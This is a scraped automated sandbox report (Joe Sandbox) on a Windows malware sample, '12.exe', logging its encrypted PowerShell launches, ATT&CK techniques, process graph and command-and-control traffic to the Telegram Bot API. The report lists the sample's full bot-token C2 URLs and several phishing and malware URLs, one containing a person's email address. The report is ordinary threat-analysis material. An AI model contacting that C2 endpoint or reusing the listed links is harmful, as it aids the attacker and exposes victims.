Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00007FF73A3F8CFC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF73A3F8CFC
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter
1
DLL Side-Loading
11
Process Injection
11
Masquerading
OS Credential Dumping1
System Time Discovery
Remote Services1
Archive Collected Data
1
Web Service
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts3
PowerShell
Boot or Logon Initialization Scripts1
DLL Side-Loading
31
Virtualization/Sandbox Evasion
LSASS Memory41
Security Software Discovery
Remote Desktop ProtocolData from Removable Media11
Encrypted Channel
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
Process Injection
Security Account Manager1
Process Discovery
SMB/Windows Admin SharesData from Network Shared Drive1
Ingress Tool Transfer
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Deobfuscate/Decode Files or Information
NTDS31
Virtualization/Sandbox Evasion
Distributed Component Object ModelInput Capture2
Non-Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Obfuscated Files or Information
LSA Secrets1
Application Window Discovery
SSHKeylogging13
Application Layer Protocol
Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading
Cached Domain Credentials3
File and Directory Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync42
System Information Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1590581 Sample: 12.exe Startdate: 14/01/2025 Architecture: WINDOWS Score: 100 30 api.telegram.org 2->30 32 x1.i.lencr.org 2->32 34 2 other IPs or domains 2->34 44 Suricata IDS alerts for network traffic 2->44 46 Malicious sample detected (through community Yara rule) 2->46 48 Multi AV Scanner detection for submitted file 2->48 52 5 other signatures 2->52 10 12.exe 1 2->10         started        13 svchost.exe 1 1 2->13         started        signatures3 50 Uses the Telegram API (likely for C&C communication) 30->50 process4 dnsIp5 54 Suspicious powershell command line found 10->54 56 Encrypted powershell cmdline option found 10->56 16 powershell.exe 3 16 10->16         started        38 127.0.0.1 unknown unknown 13->38 signatures6 process7 signatures8 40 Malicious encrypted Powershell command line found 16->40 42 Encrypted powershell cmdline option found 16->42 19 Acrobat.exe 60 16->19         started        21 powershell.exe 14 15 16->21         started        24 conhost.exe 16->24         started        process9 dnsIp10 26 AcroCEF.exe 107 19->26         started        36 api.telegram.org 149.154.167.220, 443, 49704, 49705 TELEGRAMRU United Kingdom 21->36 process11 process12 28 AcroCEF.exe 2 26->28         started       

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
12.exe17%VirustotalBrowse
12.exe16%ReversingLabsWin64.Adware.RedCap
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
bg.microsoft.map.fastly.net
199.232.214.172
truefalse
    high
    api.telegram.org
    149.154.167.220
    truefalse
      high
      x1.i.lencr.org
      unknown
      unknownfalse
        high
        206.23.85.13.in-addr.arpa
        unknown
        unknownfalse
          high
          NameMaliciousAntivirus DetectionReputation
          https://api.telegram.org/bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=989444376false
            high
            https://api.telegram.org/bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=124false
              high
              NameSourceMaliciousAntivirus DetectionReputation
              http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.3894305093.000002AE05E3E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3939204462.000002AE144EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3939204462.000002AE14622000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3953240514.000001C859E44000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3953240514.000001C859D01000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000001.00000002.3894305093.000002AE05976000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  http://x1.i.lencr.org/2D85F72862B55C4EADD9E66E06947F3D0.6.drfalse
                    high
                    https://api.telegram.orgpowershell.exe, 00000005.00000002.3894525884.000001C84B896000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3894525884.000001C84B68F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3894525884.000001C84B2C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3894525884.000001C84B746000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3894525884.000001C84B831000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3894525884.000001C84BABF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3894525884.000001C84B6F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3894525884.000001C84BB27000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3894525884.000001C84B5CB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3894525884.000001C84B46B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3894525884.000001C84B729000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3894525884.000001C84BC1D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3894525884.000001C84B809000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3894525884.000001C84BAF4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3894525884.000001C84BB5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3894525884.000001C84BBF5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3894525884.000001C84BA75000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3894525884.000001C84B3C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3894525884.000001C84B8B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3894525884.000001C84BC3D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3894525884.000001C84BBBF000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000005.00000002.3894525884.000001C849EC9000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://api.telegram.org/botpowershell.exe, 00000005.00000002.3894525884.000001C849EC9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3894525884.000001C849C91000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000005.00000002.3894525884.000001C849EC9000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://go.micropowershell.exe, 00000005.00000002.3894525884.000001C84A8C9000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://contoso.com/Licensepowershell.exe, 00000005.00000002.3953240514.000001C859D01000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://contoso.com/Iconpowershell.exe, 00000005.00000002.3953240514.000001C859D01000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://crl.ver)svchost.exe, 00000007.00000002.3716328092.000001BDE9E68000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    https://g.live.com/odclientsettings/ProdV2.C:svchost.exe, 00000007.00000003.2081812677.000001BDE9BB0000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr, edb.log.7.drfalse
                                      high
                                      https://github.com/Pester/Pesterpowershell.exe, 00000005.00000002.3894525884.000001C849EC9000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://g.live.com/odclientsettings/Prod/C:edb.log.7.drfalse
                                          high
                                          https://api.telegram.org/bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0Ppowershell.exe, 00000005.00000002.3894525884.000001C849EC9000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://api.telegram.org/bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=powershell.exe, 00000005.00000002.3894525884.000001C84B896000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3894525884.000001C84B68F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3894525884.000001C84B2C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3894525884.000001C84B746000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3894525884.000001C84B831000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3894525884.000001C84BABF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3894525884.000001C84B6F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3894525884.000001C84BB27000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3894525884.000001C84B5CB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3894525884.000001C84B46B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3894525884.000001C84B729000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3894525884.000001C84BC1D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3894525884.000001C84B809000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3894525884.000001C84BAF4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3894525884.000001C84BB5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3894525884.000001C84BBF5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3894525884.000001C84BA75000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3894525884.000001C84B3C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3894525884.000001C84B8B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3894525884.000001C84BC3D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3894525884.000001C84BBBF000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://contoso.com/powershell.exe, 00000005.00000002.3953240514.000001C859D01000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.3894305093.000002AE05E3E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3939204462.000002AE144EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3939204462.000002AE14622000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3953240514.000001C859E44000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3953240514.000001C859D01000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://oneget.orgXpowershell.exe, 00000001.00000002.3894305093.000002AE05976000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://aka.ms/pscore68powershell.exe, 00000001.00000002.3894305093.000002AE04471000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3894525884.000001C849C91000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://api.telegram.org/bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=9894443powershell.exe, 00000005.00000002.3894525884.000001C84B868000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://api.telegram.orgpowershell.exe, 00000005.00000002.3894525884.000001C84B386000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3894525884.000001C84BA97000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.3894305093.000002AE04471000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3894525884.000001C849C91000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://oneget.orgpowershell.exe, 00000001.00000002.3894305093.000002AE05976000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              • No. of IPs < 25%
                                                              • 25% < No. of IPs < 50%
                                                              • 50% < No. of IPs < 75%
                                                              • 75% < No. of IPs
                                                              IPDomainCountryFlagASNASN NameMalicious
                                                              149.154.167.220
                                                              api.telegram.orgUnited Kingdom
                                                              62041TELEGRAMRUfalse
                                                              IP
                                                              127.0.0.1
                                                              Joe Sandbox version:42.0.0 Malachite
                                                              Analysis ID:1590581
                                                              Start date and time:2025-01-14 10:02:51 +01:00
                                                              Joe Sandbox product:CloudBasic
                                                              Overall analysis duration:0h 6m 35s
                                                              Hypervisor based Inspection enabled:false
                                                              Report type:full
                                                              Cookbook file name:default.jbs
                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                              Run name:Run with higher sleep bypass
                                                              Number of analysed new started processes analysed:13
                                                              Number of new started drivers analysed:0
                                                              Number of existing processes analysed:0
                                                              Number of existing drivers analysed:0
                                                              Number of injected processes analysed:0
                                                              Technologies:
                                                              • HCA enabled
                                                              • EGA enabled
                                                              • AMSI enabled
                                                              Analysis Mode:default
                                                              Analysis stop reason:Timeout
                                                              Sample name:12.exe
                                                              Detection:MAL
                                                              Classification:mal100.bank.troj.evad.winEXE@22/44@4/2
                                                              EGA Information:
                                                              • Successful, ratio: 66.7%
                                                              HCA Information:
                                                              • Successful, ratio: 94%
                                                              • Number of executed functions: 22
                                                              • Number of non-executed functions: 68
                                                              Cookbook Comments:
                                                              • Found application associated with file extension: .exe
                                                              • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                              • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                              • Excluded IPs from analysis (whitelisted): 2.23.240.205, 54.224.241.105, 18.213.11.84, 34.237.241.83, 50.16.47.176, 162.159.61.3, 172.64.41.3, 2.23.242.162, 23.209.209.135, 199.232.214.172, 2.16.168.107, 2.16.168.105, 104.77.220.172, 172.202.163.200, 13.107.246.45, 13.85.23.206, 4.175.87.197, 20.12.23.50
                                                              • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, geo2.adobe.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net
                                                              • Execution Graph export aborted for target powershell.exe, PID 6496 because it is empty
                                                              • Not all processes where analyzed, report is missing behavior information
                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                              No simulations
                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              149.154.167.220PI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                slime crypted.exeGet hashmaliciousMassLogger RATBrowse
                                                                  ElixirInjector.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                    QUOTATION REQUIRED_Enatel s.r.l..bat.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                      Remittance Advice.exeGet hashmaliciousMassLogger RATBrowse
                                                                        PDF-3093900299039 pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                            https://ngk.ae/hurda.html?email=lara.sutton@southerntrust.hscni.netGet hashmaliciousHTMLPhisherBrowse
                                                                              https://terrific-metal-countess.glitch.me/Get hashmaliciousHTMLPhisherBrowse
                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                api.telegram.orgPI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                • 149.154.167.220
                                                                                slime crypted.exeGet hashmaliciousMassLogger RATBrowse
                                                                                • 149.154.167.220
                                                                                ElixirInjector.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                • 149.154.167.220
                                                                                QUOTATION REQUIRED_Enatel s.r.l..bat.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                • 149.154.167.220
                                                                                Remittance Advice.exeGet hashmaliciousMassLogger RATBrowse
                                                                                • 149.154.167.220
                                                                                PDF-3093900299039 pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • 149.154.167.220
                                                                                FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                • 149.154.167.220
                                                                                https://ngk.ae/hurda.html?email=lara.sutton@southerntrust.hscni.netGet hashmaliciousHTMLPhisherBrowse
                                                                                • 149.154.167.220
                                                                                https://terrific-metal-countess.glitch.me/Get hashmaliciousHTMLPhisherBrowse
                                                                                • 149.154.167.220
                                                                                6uPVRnocVS.exeGet hashmaliciousDCRatBrowse
                                                                                • 149.154.167.220
                                                                                bg.microsoft.map.fastly.netUoEDaAjHGW.exeGet hashmaliciousPureLog Stealer, QuasarBrowse
                                                                                • 199.232.210.172
                                                                                PRODUKTY.EXE.exeGet hashmaliciousAsyncRAT, PureLog StealerBrowse
                                                                                • 199.232.210.172
                                                                                2330118683179179335.jsGet hashmaliciousStrela DownloaderBrowse
                                                                                • 199.232.210.172
                                                                                G7T8lHJWWM.exeGet hashmaliciousLummaCBrowse
                                                                                • 199.232.210.172
                                                                                009.vbeGet hashmaliciousAgentTeslaBrowse
                                                                                • 199.232.210.172
                                                                                577119676170175151.jsGet hashmaliciousStrela DownloaderBrowse
                                                                                • 199.232.210.172
                                                                                RFQ.exeGet hashmaliciousQuasar, PureLog StealerBrowse
                                                                                • 199.232.210.172
                                                                                possible SPAM## Msig Insurance Europe Complete via-Sign Monday January 2025.msgGet hashmaliciousUnknownBrowse
                                                                                • 199.232.214.172
                                                                                3ClBcOpPUX.exeGet hashmaliciousCyberGateBrowse
                                                                                • 199.232.210.172
                                                                                40#U0433.docGet hashmaliciousUnknownBrowse
                                                                                • 199.232.214.172
                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                TELEGRAMRUPI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                • 149.154.167.220
                                                                                http://bu9.fysou.web.id/webs6/cx.aktifkn.fiturrGet hashmaliciousUnknownBrowse
                                                                                • 149.154.164.13
                                                                                http://bu9.fysou.web.id/webs6/aktrfn.fitur.pylterGet hashmaliciousUnknownBrowse
                                                                                • 149.154.164.13
                                                                                Handler.exeGet hashmaliciousDanaBot, VidarBrowse
                                                                                • 149.154.167.99
                                                                                sysadmin.exeGet hashmaliciousVidarBrowse
                                                                                • 149.154.167.99
                                                                                JUbmpeT.exeGet hashmaliciousVidarBrowse
                                                                                • 149.154.167.99
                                                                                slime crypted.exeGet hashmaliciousMassLogger RATBrowse
                                                                                • 149.154.167.220
                                                                                ElixirInjector.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                • 149.154.167.220
                                                                                QUOTATION REQUIRED_Enatel s.r.l..bat.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                • 149.154.167.220
                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                3b5074b1b5d032e5620f69f9f700ff0ehttps://cys-bombasml.comGet hashmaliciousUnknownBrowse
                                                                                • 149.154.167.220
                                                                                UoEDaAjHGW.exeGet hashmaliciousPureLog Stealer, QuasarBrowse
                                                                                • 149.154.167.220
                                                                                009.vbeGet hashmaliciousAgentTeslaBrowse
                                                                                • 149.154.167.220
                                                                                RFQ.exeGet hashmaliciousQuasar, PureLog StealerBrowse
                                                                                • 149.154.167.220
                                                                                PI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                • 149.154.167.220
                                                                                https://performancemanager10.successfactors.com/sf/hrisworkflowapprovelink?workflowRequestId=V4-0-a1-iHQRWD3bQis7XhhWNKzjfWwnvURbEsN0CxUc27Zt3ml0ag&company=oceanagoldT2&username=dave.oliver@oceanagold.comGet hashmaliciousUnknownBrowse
                                                                                • 149.154.167.220
                                                                                https://imtcoken.im/Get hashmaliciousUnknownBrowse
                                                                                • 149.154.167.220
                                                                                https://ipfs.io/ipfs/bafkreidfpb2invnj4i76skys5sfmk3hycbkxhquyb7d6uhnbls3gwf4a5qGet hashmaliciousHTMLPhisherBrowse
                                                                                • 149.154.167.220
                                                                                http://pub-575fb9d74c7a46f0828b37cda8dd9c40.r2.dev/docu/e_protocol.html?eGet hashmaliciousHTMLPhisherBrowse
                                                                                • 149.154.167.220
                                                                                https://eb-ri18.vercel.app/verset.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                • 149.154.167.220
                                                                                No context
                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):8192
                                                                                Entropy (8bit):0.3588072191296206
                                                                                Encrypted:false
                                                                                SSDEEP:6:6xkoaaD0JOCEfMuaaD0JOCEfMKQmDhxkoaaD0JOCEfMuaaD0JOCEfMKQmD:maaD0JcaaD0JwQQ3aaD0JcaaD0JwQQ
                                                                                MD5:663C5D6018506231E334FB3EA962ED1C
                                                                                SHA1:539A4641CE92E57E4ADEE32750A817326E596D4C
                                                                                SHA-256:066CB701C03237D2612AA647E6BF08EF594360F96E433639B0CC9EED7335F1E1
                                                                                SHA-512:5F910653FD1B12B94D314EDEDF6EB2BEC70D369D921EB5B7CF4D199B0374D6C798336E39DBF2781F3B0457280E0DDA63BDF4861DF31C08152544B0F1039D5FCD
                                                                                Malicious:false
                                                                                Reputation:moderate, very likely benign file
                                                                                Preview:*.>.................D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):1310720
                                                                                Entropy (8bit):0.8336839162151133
                                                                                Encrypted:false
                                                                                SSDEEP:1536:gJhkM9gB0CnCm0CQ0CESJPB9JbJQfvcso0l1T4MfzzTi1FjIIXYvjbglQdmHDugc:gJjJGtpTq2yv1AuNZRY3diu8iBVqFe
                                                                                MD5:FEA4441987C362EDA3639F438A8AC207
                                                                                SHA1:6D22ED58B3951F8A1E433C6D296FAEC1490B2157
